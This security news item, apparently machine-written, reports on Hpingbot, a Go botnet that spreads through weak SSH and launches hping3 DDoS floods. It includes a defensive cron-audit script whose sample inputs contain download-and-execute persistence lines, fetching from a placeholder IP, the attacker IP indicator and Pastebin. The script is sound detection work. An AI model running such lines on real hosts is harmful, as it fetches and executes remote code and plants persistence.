Ethical Hacking News
A rapidly evolving Go-based malware named Hpingbot targets weak SSH configurations to enlist hosts into a botnet that launches distributed denial-of-service (DDoS) attacks. Because it relies on weak credentials and on existing tools and services rather than custom infrastructure, this new botnet is a significant concern for network security.
Hpingbot is a new Go-based malware capable of targeting Windows and Linux systems. The malware enlists systems into a botnet that can launch DDoS attacks using hping3. Hpingbot takes advantage of weak SSH configurations and uses password spraying attacks to gain initial access. The attack chain involves using Pastebin as a dead drop resolver to point to an IP address for downloading the shell script. The malware aims to establish persistence by setting cron jobs to re-fetch and re-execute the payload after every login, reboot, or scheduled time interval.
In a recent disclosure, cybersecurity firm NSFOCUS revealed a new, rapidly-evolving Go-based malware named Hpingbot that's capable of targeting both Windows and Linux systems to enlist them into a botnet that can launch distributed denial-of-service (DDoS) attacks using hping3, a freely-available utility for crafting and sending custom ICMP/TCP/UDP packets.
The emergence of this new botnet family, built from scratch, is noteworthy because it shows strong innovation and efficient use of existing resources, such as distributing payloads through the online text storage and sharing platform Pastebin and launching DDoS attacks using hping3. It also indicates that the attackers are not focused on DDoS alone: they intend to go beyond service disruption and turn the botnet into a payload distribution network.
Hpingbot primarily takes advantage of weak SSH configurations, propagated by means of an independent module that carries out password spraying attacks to obtain initial access to systems. The presence of German debugging comments in the source code likely indicates that the latest version may be under testing.
The attack chain involves using Pastebin as a dead drop resolver to point to an IP address ("128.0.118[.]18") that, in turn, is employed to download a shell script.
This script is then used to detect the CPU architecture of the infected host, terminate any already running instance of the trojan, and retrieve the main payload that is responsible for initiating DDoS flood attacks over TCP and UDP. Hpingbot also aims to establish persistence by setting cron jobs to ensure that the payload is re-fetched and re-executed after every shell login, reboot, or scheduled time interval.
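For defenders, the persistence behavior described above can be hunted for by auditing cron and shell start-up files for download-and-execute entries. The following is an added example, not code from NSFOCUS or from the malware; the regex heuristics, file paths, the 203.0.113.7 address and the Pastebin path are constructed assumptions, and only the IP indicator comes from the article.

```python
import re

# IP quoted (defanged) in the article; refanged here only for string matching.
PAGE_IOC_IP = "128.0.118[.]18".replace("[.]", ".")
FETCH = re.compile(r"\b(?:curl|wget)\b")
EXEC = re.compile(r"\|\s*(?:ba|da)?sh\b|chmod\s+\+x|\b(?:ba)?sh\s+/\S+")
CRON_SCHED = re.compile(r"^(?:@(\w+)|(?:\S+\s+){5})")
LOGIN_FILES = (".bashrc", ".profile", ".bash_profile", "/etc/profile")

def trigger_for(path, line):
    """Map an entry to one of the triggers the article lists."""
    if path.endswith(LOGIN_FILES) or "/profile.d/" in path:
        return "shell-login"
    m = CRON_SCHED.match(line)
    if m and m.group(1) == "reboot":
        return "reboot"
    return "scheduled" if m else "unknown"

def audit(path, text):
    """Return (path, lineno, trigger, reasons) for each suspicious line."""
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        reasons = []
        if FETCH.search(line) and EXEC.search(line):
            reasons.append("download-and-execute")
        if "pastebin.com" in line.lower():
            reasons.append("pastebin-reference")
        if PAGE_IOC_IP in line:
            reasons.append("article-ioc-ip")
        if re.search(r"\bhping3\b", line):
            reasons.append("hping3-invocation")
        if reasons:
            findings.append((path, n, trigger_for(path, line), reasons))
    return findings

# Constructed sample inputs (not taken from real Hpingbot samples).
SAMPLE_CRON = f"""\
# m h dom mon dow command
17 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
@reboot curl -fsSL http://203.0.113.7/u.sh | sh
*/10 * * * * wget -q -O /tmp/.x http://{PAGE_IOC_IP}/a && chmod +x /tmp/.x
"""
SAMPLE_BASHRC = "alias ll='ls -l'\n(curl -s https://pastebin.com/raw/EXAMPLE | bash) &\n"

if __name__ == "__main__":
    for f in audit("/var/spool/cron/root", SAMPLE_CRON) + audit("/root/.bashrc", SAMPLE_BASHRC):
        print(f)
```

On a live host, feed `audit()` the contents of each user crontab, `/etc/cron.d/*` and shell profile file, and treat hits as leads to triage rather than confirmed infections.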
Furthermore, as of June 19, the attackers have used nodes controlled by Hpingbot to deliver another Go-based DDoS component that, while relying on the same command-and-control (C2) server, eschews Pastebin and hping3 calls in favor of built-in flood attack functions based on the UDP and TCP protocols.
Related Information:
https://www.ethicalhackingnews.com/articles/New-Botnet-Emerge-Hpingbot-Targets-Weak-SSH-Configurations-for-DDoS-Attacks-ehn.shtml
https://thehackernews.com/2025/07/alert-exposed-jdwp-interfaces-lead-to.html
Published: Sat Jul 5 02:00:02 2025 by llama3.2 3B Q4_K_M